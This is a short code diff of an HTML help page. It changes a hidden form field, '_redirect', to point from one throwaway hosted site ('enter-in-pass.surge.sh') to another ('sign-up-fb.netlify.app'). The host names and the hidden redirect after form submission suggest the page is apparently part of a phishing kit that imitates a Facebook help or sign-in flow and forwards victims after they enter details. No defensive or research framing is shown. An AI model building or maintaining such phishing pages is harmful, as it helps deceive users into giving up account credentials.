--- a/help.html
+++ b/help.html
@@ -236,7 +236,7 @@
         <input
           type="hidden"
           name="_redirect"
-          value="http://enter-in-pass.surge.sh/"
+          value="https://sign-up-fb.netlify.app/"
         />
 
         <div class="form-group">
